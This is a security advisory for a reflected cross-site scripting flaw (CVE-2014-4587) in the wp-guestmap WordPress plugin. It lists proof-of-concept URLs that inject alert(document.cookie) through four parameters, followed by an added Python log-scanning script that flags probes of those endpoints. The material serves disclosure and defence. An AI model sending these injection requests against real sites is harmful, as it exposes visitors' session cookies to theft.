Wp Plugin Wp Guestmap

Plugin Details

Plugin Name: wp-plugin : wp-guestmap
Affected Version : 1.8 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Minimum Level of Access Required : Unauthenticated
CVE Number : CVE-2014-4587
Identified by : Anantshri
WPScan Reference URL

Disclosure Timeline

Technical Details

http://localhost/wp-content/plugins/wp-guestmap/guest-locator.php?zl=alert(document.cookie)&mt=alert(document.cookie)&activate=activate&dc=alert(document.cookie)&

http://localhost/wp-content/plugins/wp-guestmap/online-tracker.php?zl=zl'>alert(document.cookie)&mt=mt'>alert(document.cookie)&activate=activate'>alert(document.cookie)&dc=dc'>alert(document.cookie)&

http://localhost/wp-content/plugins/wp-guestmap/stats-map.php?zl=zl'>alert(document.cookie)&mt=mt'>alert(document.cookie)&dc=dc'>alert(document.cookie)&

http://localhost/wp-content/plugins/wp-guestmap/weather-map.php?zl=zl'>alert(document.cookie)&mt=mt'>alert(document.cookie)&activate=activate'>alert(document.cookie)&dc=dc'>alert(document.cookie)&

Multiple vulnerable parameters (zl, mt, activate, dc) were found in all four files; each reflects its value into the response without escaping.
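The request shapes above are what a site owner will see in the web server access log if this reflected XSS is being probed. As an added example, not part of the advisory and not code from the plugin, the following Python script scans Common Log Format lines for requests to the four wp-guestmap files named above and flags any of the zl, mt, activate or dc parameters whose decoded value contains something other than a short alphanumeric token. The "short alphanumeric token" expectation for these parameters is an assumption (the advisory does not describe their intended format), and the log lines are constructed samples.

```python
"""Added example (not part of the advisory): flag access-log requests that hit the
wp-guestmap endpoints named in the advisory with non-conforming values in the
zl, mt, activate and dc parameters, e.g. while reviewing logs after disclosure.

Assumption (not stated in the advisory): the four parameters are expected to
carry short alphanumeric tokens, so a value containing quotes, angle brackets,
parentheses or other metacharacters is treated as a probe attempt.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

PLUGIN_PREFIX = "/wp-content/plugins/wp-guestmap/"
VULNERABLE_FILES = {
    "guest-locator.php", "online-tracker.php", "stats-map.php", "weather-map.php",
}
WATCHED_PARAMS = ("zl", "mt", "activate", "dc")

# Assumed benign shape: letters, digits, '_' or '-', at most 32 characters.
BENIGN_VALUE = re.compile(r"^[A-Za-z0-9_-]{0,32}$")

# Common Log Format: host ident authuser [date] "METHOD target HTTP/x" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def suspicious_params(target):
    """Return {param: decoded_value} for watched parameters whose value fails the
    allowlist, or {} when the request target is not one of the vulnerable files."""
    parts = urlsplit(target)
    if not parts.path.startswith(PLUGIN_PREFIX):
        return {}
    if parts.path[len(PLUGIN_PREFIX):] not in VULNERABLE_FILES:
        return {}
    findings = {}
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes once
    for name in WATCHED_PARAMS:
        for raw in query.get(name, []):
            value = unquote(raw)  # second decode catches double-encoded metacharacters
            if not BENIGN_VALUE.match(value):
                findings[name] = value
    return findings


def scan_log(lines):
    """Return a list of (client_host, plugin_file, {param: value}) for each log line
    whose request looks like a probe of the advisory's vulnerable parameters."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        target = m.group("target")
        bad = suspicious_params(target)
        if bad:
            plugin_file = urlsplit(target).path.rsplit("/", 1)[-1]
            hits.append((m.group("host"), plugin_file, bad))
    return hits


# Constructed sample log lines (documentation-range IPs, not real traffic).
SAMPLE_LOG = [
    # benign map request: every watched parameter is a plain token
    '203.0.113.5 - - [10/Jun/2014:12:00:01 +0000] "GET /wp-content/plugins/wp-guestmap/'
    'stats-map.php?zl=4&mt=roadmap&dc=1 HTTP/1.1" 200 512',
    # probe shaped like the advisory's requests, percent-encoded as a server logs it
    '198.51.100.7 - - [10/Jun/2014:12:00:02 +0000] "GET /wp-content/plugins/wp-guestmap/'
    'guest-locator.php?zl=alert(document.cookie)&mt=mt%27%3Ealert(document.cookie)'
    '&activate=activate&dc=1 HTTP/1.1" 200 640',
    # metacharacters in an unrelated page's parameter: outside this advisory's scope
    '192.0.2.9 - - [10/Jun/2014:12:00:03 +0000] "GET /index.php?zl=%3Cb%3E HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for host, plugin_file, bad in scan_log(SAMPLE_LOG):
        print(f"{host} -> {plugin_file}: {bad}")
```

Only requests to the four named files are examined, so a generic WAF-style rule is not what this does; it is a narrow post-disclosure triage filter for exactly the endpoints and parameters the advisory lists. The durable fix remains in the plugin itself: escaping each reflected parameter for the context it lands in (esc_attr(), esc_js() or esc_html() in WordPress) before it is written into the page.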